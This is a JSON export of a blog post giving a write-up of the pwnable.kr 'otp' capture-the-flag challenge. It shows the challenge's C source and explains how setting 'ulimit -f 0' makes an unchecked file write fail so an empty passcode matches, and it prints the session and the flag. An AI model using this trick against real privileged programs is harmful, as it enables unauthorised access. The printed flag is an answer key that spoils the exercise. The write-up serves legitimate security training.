{"id":3271,"date":"2025-04-10T18:59:07","date_gmt":"2025-04-10T09:59:07","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3271"},"modified":"2025-04-10T18:59:08","modified_gmt":"2025-04-10T09:59:08","slug":"otp","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3271","title":{"rendered":"otp"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">I made a skeleton interface for one time password authentication system.\nI guess there are no security mistakes. could you take a look at it?\n\nHint : no need to brute-force\n\nssh otp@pwnable.kr -p2222 (pw:guest)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Source Code<\/h1>\n\n\n\n<ul class=\"wp-block-list\">\n<li>otp.c<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;stdlib.h>\n#include &lt;string.h>\n#include &lt;fcntl.h>\n#include &lt;unistd.h>  \/* read, close, unlink, setregid, getegid *\/\n\nint main(int argc, char* argv[]){\n\tchar fname[128];\n\tunsigned long long otp[2];\n\n\tif(argc!=2){\n\t\tprintf(\"usage : .\/otp [passcode]\\n\");\n\t\treturn 0;\n\t}\n\n\tint fd = open(\"\/dev\/urandom\", O_RDONLY);\n\tif(fd==-1) exit(-1);\n\n\tif(read(fd, otp, 16)!=16) exit(-1);\n\tclose(fd);\n\n\tsprintf(fname, \"\/tmp\/%llu\", otp[0]);\n\tFILE* fp = fopen(fname, \"w\");\n\tif(fp==NULL){ exit(-1); }\n\tfwrite(&amp;otp[1], 8, 1, fp);\n\tfclose(fp);\n\n\tprintf(\"OTP generated.\\n\");\n\n\tunsigned long long passcode=0;\n\tFILE* fp2 = fopen(fname, \"r\");\n\tif(fp2==NULL){ exit(-1); }\n\tfread(&amp;passcode, 8, 1, fp2);\n\tfclose(fp2);\n\t\n\tif(strtoul(argv[1], 0, 16) == 
passcode){\n\t\tprintf(\"Congratz!\\n\");\n\t\tsetregid(getegid(), getegid());\n\t\tsystem(\"\/bin\/cat flag\");\n\t}\n\telse{\n\t\tprintf(\"OTP mismatch\\n\");\n\t}\n\n\tunlink(fname);\n\treturn 0;\n}\n<\/pre>\n\n\n\n<p>The program reads 16 bytes (two 8-byte values) from <code>\/dev\/urandom<\/code> and stores them in <code>otp[0]<\/code> and <code>otp[1]<\/code>.<\/p>\n\n\n\n<p>The temporary file is named <code>\/tmp\/[otp[0]]<\/code>, and its contents are set to <code>otp[1]<\/code> (8 bytes).<\/p>\n\n\n\n<p>The program then reopens the temporary file it just created, reads the <code>otp[1]<\/code> value back, and compares it with the user input <code>argv[1]<\/code> parsed as a hexadecimal number; if the two match, the flag is obtained.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Solution<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">ulimit<\/h2>\n\n\n\n<p>In short, the <code>ulimit<\/code> command lets you set an arbitrary limit on the size of files that can be created.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ULIMIT(3)                   Linux Programmer's Manual                   ULIMIT(3)\n\nNAME\n       ulimit - get and set user limits\n\nSYNOPSIS\n       #include &lt;ulimit.h>\n\n       long ulimit(int cmd, long newlimit);\n\nDESCRIPTION\n       Warning:  this  routine  is obsolete.  Use getrlimit(2), setrlimit(2), and\n       sysconf(3) instead.  
For the shell command ulimit(), see bash(1).\n\n       The ulimit() call will get or set some limit for the calling process.  The\n       cmd argument can have one of the following values.\n\n       UL_GETFSIZE\n              Return the limit on the size of a file, in units of 512 bytes.\n\n       UL_SETFSIZE\n              Set the limit on the size of a file.\n\n       3      (Not  implemented  for Linux.)  Return the maximum possible address\n              of the data segment.\n\n       4      (Implemented but no symbolic constant provided.)  Return the  maxi\u2010\n              mum number of files that the calling process can open.\n\nRETURN VALUE\n       On  success,  ulimit()  returns  a nonnegative value.  On error, -1 is re\u2010\n       turned, and errno is set appropriately.\n\nERRORS\n       EPERM  An unprivileged process tried to increase a limit.\n\nATTRIBUTES\n       For an explanation of the terms used in this section, see attributes(7).\n\n       \u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n       \u2502Interface \u2502 Attribute     \u2502 Value   \u2502\n       \u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u253c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n       \u2502ulimit()  \u2502 Thread safety \u2502 MT-Safe \u2502\n       \u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518\n\nCONFORMING TO\n       SVr4, POSIX.1-2001.  
POSIX.1-2008 marks ulimit() as obsolete.\n\nSEE ALSO\n       bash(1), getrlimit(2), setrlimit(2), sysconf(3)<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<p>Because the maximum size of files that can be created was set to 0, the <code>fread<\/code> from <code>fp2<\/code> reads nothing into <code>passcode<\/code>, so it keeps its initial value of 0.<\/p>\n\n\n\n<p>Therefore, running otp with an empty argument, which <code>strtoul<\/code> parses as 0, yields the flag.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">otp@ubuntu:~$ ulimit -f 0\notp@ubuntu:~$ python2\nPython 2.7.18 (default, Dec  9 2024, 18:47:23) \n[GCC 11.4.0] on linux2\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import subprocess\n>>> subprocess.call(['\/home\/otp\/otp', ''])\nOTP generated.\nCongratz!\nf1le_0peration_r3turn_value_matters<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description Source Code The program reads 16 bytes (two 8-byte values) from \/dev\/urandom and stores them in otp[0] and otp[1]. The temporary file is named \/tmp\/[otp[0]], and its contents are set to otp[1] (8 bytes). The program then reopens the temporary file it just created, reads the otp[1] value back, and compares it with the user input argv[1] parsed as a hexadecimal number; if the two match, the flag is obtained. 
Solution ulimit In short, the ulimit command lets you arbitrarily set the size of files that can be created&hellip;&nbsp;<a href=\"https:\/\/h4ck.kr\/?p=3271\" rel=\"bookmark\">Read more &raquo;<span class=\"screen-reader-text\">otp<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-3271","post","type-post","status-publish","format-standard","hentry","category-uncategorized"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3271","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3271"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3271\/revisions"}],"predecessor-version":[{"id":3272,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3271\/revisions\/3272"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3271"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3271"},{"taxonomy":"post_tag","embe
ddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3271"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}